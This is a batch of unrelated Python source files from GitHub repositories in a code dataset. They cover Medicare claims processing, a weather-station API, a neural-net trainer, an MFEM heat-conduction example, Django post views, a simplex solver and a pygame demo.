select pu related claims\n\n ## 1) select SNF claims\n snf = medpar[medpar.SS_LS_SNF_IND_CD == 'N']\n ## 2) select columns\n snf = snf[col_use]\n ## apply the function to identify UTI SNF claims\n snf_uti = snf.map_partitions(lambda ddf: ddf.apply(identify_uti_claims, axis=1))\n\n snf_uti[snf_uti['claim_typeUTI'] == \"primary\"].repartition(npartitions=20).to_parquet(\n writePath + 'SNFprimaryUTI/{}/'.format(year)\n )\n snf_uti[snf_uti['claim_typeUTI'] == \"second\"].repartition(npartitions=20).to_parquet(\n writePath + 'SNFsecondUTI/{}/'.format(year)\n )\n snf_uti[snf_uti['claim_typeUTI'] == \"secondary\"].repartition(npartitions=40).to_parquet(\n writePath + 'SNFsecondaryUTI/{}/'.format(year)\n )\n ## apply the function to identify pneumonia SNF claims\n snf_pneu = snf.map_partitions(lambda ddf: ddf.apply(identify_pneu_claims, axis=1))\n\n snf_pneu[snf_pneu['claim_typePNEU'] == \"primary\"].repartition(npartitions=20).to_parquet(\n writePath + 'SNFprimaryPNEU/{}/'.format(year)\n )\n snf_pneu[snf_pneu['claim_typePNEU'] == \"second\"].repartition(npartitions=20).to_parquet(\n writePath + 'SNFsecondPNEU/{}/'.format(year)\n )\n snf_pneu[snf_pneu['claim_typePNEU'] == \"secondary\"].repartition(npartitions=40).to_parquet(\n writePath + 'SNFsecondaryPNEU/{}/'.format(year)\n )\n#\n\n## set BENE_ID as index for SNF claims\nfor year in years:\n for ctype in claims_type:\n df = dd.read_parquet(writePath + 'SNF{0}UTI/{1}/'.format(ctype, year))\n df_index = df.set_index('BENE_ID')\n df_index.to_parquet(writePath + 'SNF{0}UTI_indexed/{1}/'.format(ctype, year))\n\n\n\nfor year in years:\n for ctype in claims_type:\n df = dd.read_parquet(writePath + 'SNF{0}PNEU/{1}/'.format(ctype, year))\n df_index = df.set_index('BENE_ID')\n df_index.to_parquet(writePath + 'SNF{0}PNEU_indexed/{1}/'.format(ctype, year))\n","repo_name":"sanghavi-lab/nhc_infections","sub_path":"1_snf_infections.py","file_name":"1_snf_infections.py","file_ext":"py","file_size_in_byte":5278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11933443806","text":"from datetime import date\n\nfrom sqlalchemy import desc, func, select\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom exceptions import NoDataException\nfrom information.utils import get_avg_direction\nfrom station.models import point\n\n\nasync def get_date_avg_data(station_id: int, req_date: date, session: AsyncSession):\n points_query = select(point).where(point.c.station_id == station_id).filter(func.date(point.c.date) == req_date)\n points = await session.execute(points_query)\n points = points.all()\n points_count = len(points)\n\n if points_count == 0:\n raise NoDataException(\"No data\")\n\n temperature, wind_direction, wind_speed, air_humidity = 0, 0, 0, 0\n wind_directions = []\n\n for p in points:\n temperature += p[3]\n wind_directions.append(p[4])\n wind_speed += p[5]\n air_humidity += p[6]\n\n wind_direction = (get_avg_direction(wind_directions))\n\n return {\n \"avg_temperature\": temperature / points_count,\n \"avg_wind_direction\": wind_direction,\n \"avg_wind_speed\": wind_speed / points_count,\n \"avg_air_humidity\": air_humidity / points_count,\n }\n\n\nasync def get_last_station_point_data(station_id: int, session: AsyncSession):\n query = select(point).where(point.c.station_id == station_id).order_by(point.c.date.desc())\n points = await session.execute(query)\n points = points.first()\n return {\n \"temperature\": points[3],\n \"wind_directions\": points[4],\n \"wind_speed\": points[5],\n 
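# --- Editor's aside (hedged sketch): the identify_uti_claims /
# identify_pneu_claims pair in the MedPAR script above is a positional priority
# over diagnosis codes; a compact restatement, with uti_codes standing in for
# the ICD set loaded from icd.csv:
def classify_claim(dgns_codes, uti_codes):
    # dgns_codes: values of DGNS_1_CD .. DGNS_25_CD, in order
    if dgns_codes[0] in uti_codes:
        return 'primary'      # first-listed diagnosis is UTI
    if dgns_codes[1] in uti_codes:
        return 'second'       # second-listed diagnosis is UTI
    if any(code in uti_codes for code in dgns_codes[2:]):
        return 'secondary'    # any remaining diagnosis is UTI
    return 'not_uti'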
\"air_humidity\": points[6],\n    }\n\n\n","repo_name":"lopachukseva/weather-station-api","sub_path":"src/information/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"71967203027","text":"import logging.config\nfrom actuctic.start import Start\n\n\n# Configure the log file and log level\nlogging.config.fileConfig('log_config.ini')\n\n# Test startup input when no device is connected\ntry:\n    app_start = Start()\n    app_start.start_ui()\nexcept BaseException:\n    logging.critical('no_device_start------start error')\n","repo_name":"fangchaooo/ActuaticUI-automation-Test","sub_path":"no_device_start.py","file_name":"no_device_start.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"71760729105","text":"### You'll probably want to import some things, do that before function\r\n### definitions\r\n\r\n### function definitions at top!!!\r\n\r\nif __name__ == '__main__':\r\n\t### There's a FITS file with WCS information in this folder. Load the file and \r\n\t### make a plot, with axes in equatorial coordinates. Overlay a galactic \r\n\t### coordinate grid on the plot\r\n\r\n\r\n\t### Here are some names in a target list\r\n\ttgtnames = ['HD 189733', 'HD 209458', 'HD 149026', 'WASP-33', 'KELT-9', 'TOI-1518']\r\n\r\n\t### Write a function that takes a target Kmag and exposure time and \r\n\t### estimates the SNR of a Keck/NIRSPEC seeing-limited observation\r\n\t### in the Kband-new filter. Define your functions outside of main!! (why?)\r\n\r\n\t### Query Simbad for the Kband magnitudes of the listed targets.\r\n\t### Use your function to print the SNR in a 300s exposure for each target\r\n\r\n","repo_name":"lfinnerty/Astro142-SP23-Disc","sub_path":"Discussion12/discussion12_activity_template.py","file_name":"discussion12_activity_template.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
{"seq_id":"39733412746","text":"import numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data.sampler import BatchSampler, SubsetRandomSampler\n\nfrom sklearn.model_selection import train_test_split as tts\nfrom sklearn.metrics import confusion_matrix\n\nfrom sklearn.linear_model import LogisticRegression\n\nfrom model import Model\n\nclass Trainer:\n\n    def __init__(self, feed_size, output_size, fc1_units, fc2_units, lr, checkpoint='./checkpoint.pth'):\n\n        self.model = Model(feed_size, output_size, fc1_units, fc2_units)\n        # self.optimizer = optim.Adam(self.model.parameters(), lr=lr)\n        self.optimizer = optim.SGD(self.model.parameters(), lr=lr, momentum=0.9)\n\n        self.checkpoint = checkpoint\n\n        self.model.load(self.checkpoint)\n\n        self.classifier = LogisticRegression(random_state=0)\n    \n    def train_with_logistic_regression(self, feed, target):\n        # subsets \n        train_feed, test_feed, train_target, test_target = tts(feed, target, test_size=0.1, random_state=0)\n\n        print('Learning: Logistic Regression')\n\n        self.classifier.fit(train_feed, train_target)\n\n        print('\\nEnd')\n        print('')\n\n        self._test_with_logistic_regression(test_feed, test_target)\n    \n    def _test_with_logistic_regression(self, feed, target):\n        print('Checking accuracy...')\n        print('')\n\n        test_predictions = self.classifier.predict(feed)\n\n        test_target = target.astype(np.uint8)\n        test_predictions = np.asarray( [ np.round(x) for x in test_predictions 
] ) \n\n cm = confusion_matrix(test_target, test_predictions)\n\n diagonal_sum = cm.trace()\n all_elements = cm.sum()\n accuracy = diagonal_sum / all_elements\n print('Confusion matrix')\n print(cm)\n print('')\n print('Accuracy: {:.2f}'.format(accuracy))\n\n print('')\n print('End')\n \n \n def train_with_nn(self, feed, target, batch_size=512, epochs=1):\n\n # target = np.array( [ [0, 1] if t == 0 else [1, 0] for t in target ] )\n # subsets\n train_feed, test_feed, train_target, test_target = tts(feed, target, test_size=0.1, random_state=0)\n\n print('Learning: Neural Model') \n\n # criterion = nn.BCELoss()\n criterion = nn.CrossEntropyLoss()\n\n for epoch in range(epochs):\n batch = BatchSampler( SubsetRandomSampler( range(train_feed.shape[0]) ), batch_size, drop_last=False)\n\n batch_count = 0\n for batch_indices in batch:\n batch_indices = torch.tensor(batch_indices).long() \n batch_count += 1\n\n feeds = train_feed[batch_indices]\n targets = train_target[batch_indices].squeeze(1)\n\n # to tensor\n feeds = torch.tensor(feeds).float()\n # targets = torch.tensor(targets.astype(np.uint8)).float()\n targets = torch.tensor(targets).long()\n \n # forward\n predictions = self.model(feeds)\n\n # loss \n loss = criterion(predictions, targets)\n\n # Minimize the loss\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n print('\\rEpoch: \\t{} \\tBatch: \\t{} \\tLoss: \\t{:.8f}'.format(epoch+1, batch_count, loss.cpu().data.numpy()), end=\"\") \n \n print('\\nEnd')\n print('')\n\n self._test_with_nn(test_feed, test_target)\n\n # self.model.checkpoint(self.checkpoint)\n\n def _test_with_nn(self, feed, target, batch_size=512):\n\n print('Checking accuracy...')\n print('')\n\n batch = BatchSampler( SubsetRandomSampler( range(feed.shape[0]) ), batch_size, drop_last=False)\n\n test_predictions = []\n for batch_indices in batch:\n batch_indices = torch.tensor(batch_indices).long()\n\n feeds = feed[batch_indices]\n\n # to tensor\n feeds = torch.tensor(feeds).float() \n \n self.model.eval()\n with torch.no_grad():\n predictions = self.model(feeds).cpu().data.numpy()\n \n test_predictions.append( predictions )\n\n # for i in range( len(predictions) ):\n # print('Target: \\t{} \\t Predict: \\t{} {}'.format( target_set[i].squeeze(0), False if predictions[i] < 0.5 else True, predictions[i] )) \n\n\n test_target = target.astype(np.uint8)\n test_predictions = np.concatenate( test_predictions )\n test_predictions = np.asarray( [ np.argmax(x) for x in test_predictions ] ) \n\n cm = confusion_matrix(test_target, test_predictions)\n\n diagonal_sum = cm.trace()\n all_elements = cm.sum()\n accuracy = diagonal_sum / all_elements\n print('Confusion matrix')\n print(cm)\n print('')\n print('Accuracy: {:.2f}'.format(accuracy))\n\n print('')\n print('End')\n \n ","repo_name":"ibrahimth/Studies-and-Researches","sub_path":"ML Python/Exercise_Predition_2/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30686832602","text":"'''\n MFEM example 16\n\n How to run:\n python \n\n Example of arguments:\n ex16.py -m inline-tri.mesh\n ex16.py -m disc-nurbs.mesh -tf 2\n ex16.py -s 1 -a 0.0 -k 1.0\n ex16.py -s 2 -a 1.0 -k 0.0\n ex16.py -s 3 -a 0.5 -k 0.5 -o 4\n ex16.py -s 14 -dt 1.0e-4 -tf 4.0e-2 -vs 40\n ex16.py -m fichera-q2.mesh\n ex16.py -m escher.mesh\n ex16.py -m beam-tet.mesh -tf 10 -dt 0.1\n ex16.py -m amr-quad.mesh -o 4 -r 0\n ex16.py -m amr-hex.mesh -o 2 -r 
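# --- Editor's aside (hedged check): the trace/sum accuracy used by the Trainer
# above is the same quantity sklearn.metrics.accuracy_score reports; tiny check:
import numpy as np
from sklearn.metrics import accuracy_score, confusion_matrix

y_true = np.array([0, 1, 1, 0, 1])
y_hat = np.array([0, 1, 0, 0, 1])
cm = confusion_matrix(y_true, y_hat)
assert np.isclose(cm.trace() / cm.sum(), accuracy_score(y_true, y_hat))  # both 0.8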
0\n\n'''\nimport sys\nfrom mfem.common.arg_parser import ArgParser\nfrom os.path import expanduser, join, dirname\nimport numpy as np\nfrom mfem import path\n\nimport mfem.ser as mfem\nfrom mfem.ser import intArray\n\n\nclass ConductionOperator(mfem.PyTimeDependentOperator):\n    def __init__(self, fespace, alpha, kappa, u):\n        mfem.PyTimeDependentOperator.__init__(\n            self, fespace.GetTrueVSize(), 0.0)\n        rel_tol = 1e-8\n        self.alpha = alpha\n        self.kappa = kappa\n        self.T = None\n        self.K = None\n        self.M = None\n        self.fespace = fespace\n\n        self.ess_tdof_list = intArray()\n        self.Mmat = mfem.SparseMatrix()\n        self.Kmat = mfem.SparseMatrix()\n        self.M_solver = mfem.CGSolver()\n        self.M_prec = mfem.DSmoother()\n        self.T_solver = mfem.CGSolver()\n        self.T_prec = mfem.DSmoother()\n        self.z = mfem.Vector(self.Height())\n\n        self.M = mfem.BilinearForm(fespace)\n        self.M.AddDomainIntegrator(mfem.MassIntegrator())\n        self.M.Assemble()\n        self.M.FormSystemMatrix(self.ess_tdof_list, self.Mmat)\n\n        self.M_solver.iterative_mode = False\n        self.M_solver.SetRelTol(rel_tol)\n        self.M_solver.SetAbsTol(0.0)\n        self.M_solver.SetMaxIter(30)\n        self.M_solver.SetPrintLevel(0)\n        self.M_solver.SetPreconditioner(self.M_prec)\n        self.M_solver.SetOperator(self.Mmat)\n\n        self.T_solver.iterative_mode = False\n        self.T_solver.SetRelTol(rel_tol)\n        self.T_solver.SetAbsTol(0.0)\n        self.T_solver.SetMaxIter(100)\n        self.T_solver.SetPrintLevel(0)\n        self.T_solver.SetPreconditioner(self.T_prec)\n\n        self.SetParameters(u)\n\n    def Mult(self, u, du_dt):\n        # Compute:\n        #    du_dt = M^{-1}*-K(u) for du_dt\n        self.Kmat.Mult(u, self.z)\n        self.z.Neg()   # z = -z\n        self.M_solver.Mult(self.z, du_dt)\n\n    def ImplicitSolve(self, dt, u, du_dt):\n        # Solve the equation:\n        #    du_dt = M^{-1}*[-K(u + dt*du_dt)]\n        # for du_dt\n        if self.T is None:\n            self.T = mfem.Add(1.0, self.Mmat, dt, self.Kmat)\n            current_dt = dt\n            self.T_solver.SetOperator(self.T)\n        self.Kmat.Mult(u, self.z)\n        self.z.Neg()\n        self.T_solver.Mult(self.z, du_dt)\n\n    def SetParameters(self, u):\n        u_alpha_gf = mfem.GridFunction(self.fespace)\n        u_alpha_gf.SetFromTrueDofs(u)\n        for i in range(u_alpha_gf.Size()):\n            u_alpha_gf[i] = self.kappa + self.alpha * u_alpha_gf[i]\n\n        self.K = mfem.BilinearForm(self.fespace)\n        u_coeff = mfem.GridFunctionCoefficient(u_alpha_gf)\n        self.K.AddDomainIntegrator(mfem.DiffusionIntegrator(u_coeff))\n        self.K.Assemble()\n        self.K.FormSystemMatrix(self.ess_tdof_list, self.Kmat)\n        self.T = None\n\n\nclass InitialTemperature(mfem.PyCoefficient):\n    def EvalValue(self, x):\n        xx = np.array(x)\n        norm2 = np.sqrt(np.sum(xx**2))\n        if norm2 < 0.5:\n            return 2.0\n        return 1.0\n\n\nparser = ArgParser(description='Ex16')\nparser.add_argument('-m', '--mesh',\n                    default='star.mesh',\n                    action='store', type=str,\n                    help='Mesh file to use.')\nparser.add_argument('-r', '--refine',\n                    action='store', default=2, type=int,\n                    help=\"Number of times to refine the mesh uniformly, -1 for auto.\")\nparser.add_argument('-o', '--order',\n                    action='store', default=2, type=int,\n                    help=\"Finite element order (polynomial degree)\")\nparser.add_argument('-s', '--ode-solver',\n                    action='store', default=3, type=int,\n                    help='\\n'.join([\"ODE solver: 1 - Backward Euler, 2 - SDIRK2, 3 - SDIRK3\",\n                                    \"\\t\\t 11 - Forward Euler, 12 - RK2, 13 - RK3 SSP, 14 - RK4.\"]))\nparser.add_argument('-tf', '--t-final',\n                    action='store', default=0.5, type=float,\n                    help=\"Final time; start time is 0.\")\nparser.add_argument(\"-dt\", \"--time-step\",\n                    action='store', default=0.01, type=float,\n                    help=\"Time step.\")\nparser.add_argument('-a', '--alpha',\n                    
action='store', default=0.01, type=float,\n                    help='Alpha coefficient')\nparser.add_argument('-k', '--kappa',\n                    action='store', default=0.5, type=float,\n                    help='Kappa coefficient')\nparser.add_argument('-vis', '--visualization',\n                    action='store_true',\n                    help='Enable GLVis visualization')\nparser.add_argument('-vs', '--visualization-steps',\n                    action='store', default=5, type=int,\n                    help=\"Visualize every n-th timestep.\")\n\nargs = parser.parse_args()\nref_levels = args.refine\norder = args.order\ndt = args.time_step\nt_final = args.t_final\nalpha = args.alpha\nkappa = args.kappa\nvisualization = args.visualization\nvis_steps = args.visualization_steps\node_solver_type = args.ode_solver\nmeshfile = expanduser(\n    join(dirname(__file__), '..', 'data', args.mesh))\nparser.print_options(args)\n\n# 2. Read the mesh from the given mesh file. We can handle triangular,\n#    quadrilateral, tetrahedral and hexahedral meshes with the same code.\nmesh = mfem.Mesh(meshfile, 1, 1)\ndim = mesh.Dimension()\n\n# 3. Define the ODE solver used for time integration. Several implicit\n#    singly diagonal implicit Runge-Kutta (SDIRK) methods, as well as\n#    explicit Runge-Kutta methods are available.\nif ode_solver_type == 1:\n    ode_solver = mfem.BackwardEulerSolver()\nelif ode_solver_type == 2:\n    ode_solver = mfem.SDIRK23Solver(2)\nelif ode_solver_type == 3:\n    ode_solver = mfem.SDIRK33Solver()\nelif ode_solver_type == 11:\n    ode_solver = mfem.ForwardEulerSolver()\nelif ode_solver_type == 12:\n    ode_solver = mfem.RK2Solver(0.5)\nelif ode_solver_type == 13:\n    ode_solver = mfem.RK3SSPSolver()\nelif ode_solver_type == 14:\n    ode_solver = mfem.RK4Solver()\nelif ode_solver_type == 22:\n    ode_solver = mfem.ImplicitMidpointSolver()\nelif ode_solver_type == 23:\n    ode_solver = mfem.SDIRK23Solver()\nelif ode_solver_type == 24:\n    ode_solver = mfem.SDIRK34Solver()\nelse:\n    print(\"Unknown ODE solver type: \" + str(ode_solver_type))\n    sys.exit(1)\n# 4. Refine the mesh to increase the resolution. In this example we do\n#    'ref_levels' of uniform refinement, where 'ref_levels' is a\n#    command-line parameter.\nfor lev in range(ref_levels):\n    mesh.UniformRefinement()\n# 5. Define the vector finite element space representing the current and the\n#    initial temperature, u_ref.\nfe_coll = mfem.H1_FECollection(order, dim)\nfespace = mfem.FiniteElementSpace(mesh, fe_coll)\nfe_size = fespace.GetTrueVSize()\nprint(\"Number of temperature unknowns: \" + str(fe_size))\nu_gf = mfem.GridFunction(fespace)\n\n# 6. Set the initial conditions for u. All boundaries are considered\n#    natural.\nu_0 = InitialTemperature()\nu_gf.ProjectCoefficient(u_0)\nu = mfem.Vector()\nu_gf.GetTrueDofs(u)\n\n# 7. Initialize the conduction operator and the visualization.\noper = ConductionOperator(fespace, alpha, kappa, u)\nu_gf.SetFromTrueDofs(u)\n\nmesh.Print('ex16.mesh', 8)\nu_gf.Save('ex16-init.gf', 8)\n\nif visualization:\n    sout = mfem.socketstream(\"localhost\", 19916)\n    sout.precision(8)\n    sout << \"solution\\n\" << mesh << u_gf\n    sout << \"pause\\n\"\n    sout.flush()\n    print(\"GLVis visualization paused.\")\n    print(\" Press space (in the GLVis window) to resume it.\")\n\n
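# Note on the loop in step 8 below: ode_solver.Step(u, t, dt) advances u in\n# place and returns the updated (t, dt) pair, as used in the assignment\n# further down; testing t + dt >= t_final - dt/2 makes the final step land on\n# t_final even in the presence of floating-point drift.\n# 8. 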
Perform time-integration (looping over the time iterations, ti, with a\n# time-step dt).\node_solver.Init(oper)\nt = 0.0\nti = 1\nlast_step = False\nwhile not last_step:\n if (t + dt >= t_final - dt/2):\n last_step = True\n\n t, dt = ode_solver.Step(u, t, dt)\n\n if (last_step or (ti % vis_steps) == 0):\n # if True:\n print(\"step \" + str(ti) + \", t = \" + \"{:g}\".format(t))\n u_gf.SetFromTrueDofs(u)\n if (visualization):\n sout << \"solution\\n\" << mesh << u_gf\n sout.flush()\n ti = ti + 1\n oper.SetParameters(u)\n\n# 9. Save the final solution. This output can be viewed later using GLVis:\n# \"glvis -m ex16.mesh -g ex16-final.gf\".\nu_gf.Save('ex16-final.gf', 8)\n","repo_name":"mfem/PyMFEM","sub_path":"examples/ex16.py","file_name":"ex16.py","file_ext":"py","file_size_in_byte":8679,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"48"} +{"seq_id":"42898813905","text":"#!/data/data/com.termux/files/usr/bin/env python3\n\nimport sys, os\n# ________________________________\n\n__author__ = 'Visto-Preto'\n__version__ = '1.0.0'\ndef platform():\n\tif sys.platform == 'linux':\n\t\tif os.path.isdir('/data/data/com.termux/files/usr/share/cde/'):\n\t\t\tpath_main = '/data/data/com.termux/files/usr/share/cde/'\n\t\t\tpath_db = '/data/data/com.termux/files/usr/share/cde/settings/'\n\t\telse:\n\t\t\tpath_main = '' \n\t\t\tpath_db = 'settings/'\n \n\t\tos_cls = 'clear' \n\t\tred = '\\033[1;31m' \n\t\tgreen = '\\033[1;32m' \n\t\tyellow = '\\033[1;33m' \n\t\tblue = '\\033[1;34m' \n\t\tmagenta = '\\033[1;35m' \n\t\tcyan = '\\033[1;36m' \n\t\treset = '\\033[m'\n\t\tdelete = 'rm -rf'\n\n\n\telif sys.platform == 'win32':\n\t\tpath_main = ''\n\t\tpath_db = 'settings\\\\'\n\t\tos_cls = 'cls' \n\t\tred = '' \n\t\tgreen = '' \n\t\tyellow = '' \n\t\tblue = '' \n\t\tmagenta = '' \n\t\tcyan = '' \n\t\treset = ''\n\t\tdelete = 'del /f'\n\treturn path_main, path_db, os_cls, red, green, yellow, blue, magenta, cyan, reset, delete\n","repo_name":"Visto-Preto/CaixaDeEconomias-GUI","sub_path":"module/platform.py","file_name":"platform.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1390427133","text":"from django.views.generic import ListView, DetailView, CreateView\nfrom django.views import View\nfrom .models import Dynamic, DynamicType\nfrom django.shortcuts import redirect, reverse\nfrom .forms import DynamicCreateForm\n\ndef paginator_handle(request, context):\n paginator = context['paginator']\n page_num = request.GET.get('page', 1)\n page_of_dynamics = paginator.get_page(page_num)\n current_page_num = page_of_dynamics.number\n page_range = list(range(max(current_page_num - 2, 1), current_page_num)) + \\\n list(range(current_page_num, min(current_page_num + 2, paginator.num_pages) + 1))\n\n if page_range[0] - 1 >= 2:\n page_range.insert(0, '...')\n if paginator.num_pages - page_range[-1] >= 2:\n page_range.append('...')\n if page_range[0] != 1:\n page_range.insert(0, 1)\n if page_range[-1] != paginator.num_pages:\n page_range.append(paginator.num_pages)\n context['page_range'] = page_range\n context['page_of_dynamics'] = page_of_dynamics\n return context\n\n\nclass DynamicsList(ListView):\n template_name = 'dynamic/dynamics_list.html'\n context_object_name = 'dynamic_list'\n paginate_by = 4\n allow_empty = True\n\n def get_queryset(self):\n return Dynamic.objects.filter(is_public=True, is_delete=False)\n\n def get_context_data(self, **kwargs):\n context = 
super().get_context_data(**kwargs)\n        return paginator_handle(self.request, context)\n\n\nclass MyDynamicsList(ListView):\n    template_name = 'dynamic/my_dynamics_list.html'\n    context_object_name = 'dynamic_list'\n    paginate_by = 4\n    allow_empty = True\n\n    def get_queryset(self):\n        return Dynamic.objects.filter(owner=self.request.user, is_delete=False)\n\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        return paginator_handle(self.request, context)\n\n\nclass DynamicDetail(DetailView):\n    template_name = 'dynamic/dynamic_detail.html'\n\n\nclass DynamicDelete(View):\n    def get(self, request, *args, **kwargs):\n        if request.user.is_authenticated:\n            pk = request.GET.get('delete', 0)\n            dynamic = Dynamic.objects.get(pk=pk)\n            if request.user == dynamic.owner:\n                dynamic.is_delete = True\n                dynamic.save()\n            return redirect(request.GET.get('from', reverse('home')))\n        else:\n            return redirect(reverse('home'))\n\n\nclass DynamicCreate(CreateView):\n    model = Dynamic\n    template_name = 'dynamic/dynamic_create.html'\n    form_class = DynamicCreateForm\n\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context['dynamic_types'] = DynamicType.objects.values(\"type_name\").distinct()\n        return context\n\n    def form_valid(self, form):\n        if self.request.user.is_authenticated:\n            user = self.request.user\n            type = self.request.POST.get('dynamic_type', '')\n            text = form.cleaned_data['text']\n            is_public = self.request.POST.get('is_public', '')\n\n            dynamic = Dynamic()\n            dynamic.owner = user\n            dynamic.type = DynamicType.objects.filter(type_name=type).first()\n            dynamic.text = text\n            dynamic.is_public = True if is_public == 'True' else False\n            dynamic.save()\n\n            # Check whether the 'next' parameter itself contains another nested 'next'\n            if '?next=' not in self.request.GET.get('next', ''):\n                return redirect(self.request.GET.get('next', reverse('home')))\n        else:\n            return redirect(reverse('home'))\n","repo_name":"caoxunaaa/TreeHole","sub_path":"dynamic/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"2073601194","text":"import numpy\n\n\ndef main():\n    inf = open('C:/Users/Хэшэгто/Desktop/input.txt', 'r')\n    coeffs = int(inf.readline().strip())\n    inequalities = int(inf.readline().strip())\n    print('Number of variables: ', coeffs)\n    print('Number of constraints: ', inequalities)\n\n    method = SymplexMethod()\n    method.generateMatrix(coeffs, inequalities)\n\n    line = inf.readline().strip()\n    method.add_ObjectiveFunction(line, coeffs)\n\n    for i in range(inequalities):\n        line = inf.readline().strip()\n        method.add_IneqFunctions(line, coeffs, i)\n    inf.close()\n\n    print(method.table)\n    while method.iter == 0:\n        method.check_Optimality(coeffs)\n    for i in range(inequalities + 1):\n        print(method.table[i][-1])\n\n\nclass SymplexMethod:\n    iter = 0\n    def generateMatrix(self, variables, constants):\n        self.table = numpy.zeros((constants + 1, variables + constants + 1))\n        self.signs = []\n\n    def add_ObjectiveFunction(self, eq, co):\n        s = eq.split()\n        for i in range(co):\n            self.table[0][i] = -int(s[i])\n\n    def add_IneqFunctions(self, ineq, co, num):\n        s = ineq.split()\n        for i in range(co):\n            self.table[num + 1][i] = s[i]\n        self.table[num + 1][co + num] = 1\n        self.table[num + 1][-1] = s[-1]\n        self.signs += [s[-2]]\n\n    def check_Optimality(self, co):\n        min = [self.table[0][0], 0]\n
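        # Pivot-column choice: scan the objective row for the most negative\n        # reduced cost; its column becomes the entering (leading) column.\n        for i in range(co):\n            if self.table[0][i] < min[0] and self.table[0][i] < 0:\n                min[0] = self.table[0][i]\n                min[1] = 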
i\n        if min[0] >= 0:\n            print('The current basic solution is optimal!')\n            self.iter = 1\n        else:\n            self.LeadingColumn = min[1]\n            self.check_InfSolutions()\n\n    def check_InfSolutions(self):\n        p = 1\n        for i in range(1, len(self.table)):\n            if self.table[i][self.LeadingColumn] > 0:\n                p = 0\n        # the problem is unbounded only when NO row has a positive pivot entry\n        if p == 1:\n            print('The LP problem is unbounded!')\n            self.iter = 2\n        if p != 1:\n            min = [None, 1]\n            for i in range(1, len(self.table)):\n                if self.table[i][self.LeadingColumn] > 0:\n                    a = self.table[i][-1] / self.table[i][self.LeadingColumn]\n                    if min[0] is None or min[0] > a:\n                        min[0] = a\n                        min[1] = i\n\n            self.LeadingString = min[1]\n            self.tableConversion()\n\n    def tableConversion(self):\n        n = len(self.table[0])\n        m = len(self.table)\n        table = numpy.zeros((m, n))\n        a = self.table[self.LeadingString][self.LeadingColumn]\n        for i in range(m):\n            if i != self.LeadingString:\n                for j in range(n-1):\n                    table[i][j] = self.table[i][j] - (self.table[self.LeadingString][j] / a * self.table[i][self.LeadingColumn])\n                table[i][n-1] = self.table[i][n-1] - (self.table[self.LeadingString][n-1] / a * self.table[i][self.LeadingColumn])\n            else:\n                for j in range(n - 1):\n                    table[i][j] = self.table[i][j] / a\n                table[i][n-1] = self.table[i][n-1] / a\n        print(table)\n        self.table = table\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"heshegto/Game-theory","sub_path":"Symplex.py","file_name":"Symplex.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"22353903856","text":"# import the pygame package\nimport pygame\n# import pygame's locals (constants) module\nfrom pygame.locals import *\n\n# a class for the player's plane\nclass Hero(object):\n    # instance method: initialize the attributes\n    def __init__(self):\n        # self.hero = pygame.image.load(\"./feiji/hero.gif\")\n        self.x = 230\n        self.y = 600\n        self.image = pygame.image.load(\"./feiji/hero.gif\") \n\n    # instance method: return the loaded image\n    def heroImage(self): \n        return self.image\n\n    # instance method: take a surface and blit the plane at its own position\n    def heroBlit(self, screen):\n        screen.blit(self.image, (self.x, self.y))\n\n# manual test setup\nif __name__ == \"__main__\":\n\n    # initialize pygame's modules before creating any surfaces\n    pygame.init()\n\n    #1. create a window to display the content\n    screen = pygame.display.set_mode((480,600),0,32)\n\n
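    # Note: a frame-rate cap (e.g. pygame.time.Clock().tick(60)) is usually\n    # added to loops like the one below; this sketch simply redraws as fast\n    # as the event loop allows.\n    #2. 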
create a window-sized image to serve as the background\n    background = pygame.image.load(\"./feiji/background.png\").convert()\n    x=230\n    y=450\n    \n    hero = Hero()\n    # draw the background image in the window\n    while True:\n        screen.blit(background,(0,0))\n        screen.blit(hero.heroImage(),(x,y))\n        # handle the keys the user pressed\n        for event in pygame.event.get():\n            if event.type == QUIT:\n                print('exit')\n                exit()\n            elif event.type == KEYDOWN:\n                if event.key == K_a or event.key == K_LEFT:\n                    x -= 20\n                    print('left')\n                elif event.key == K_d or event.key == K_RIGHT:\n                    x += 20\n                    print('right')\n                elif event.key == K_SPACE:\n                    print('space')\n        pygame.display.update()\n\n\n\n\n\n\n\n","repo_name":"itcast-Github/python_base","sub_path":"08-类与对象/03-显示玩家飞机-面向过程2.py","file_name":"03-显示玩家飞机-面向过程2.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
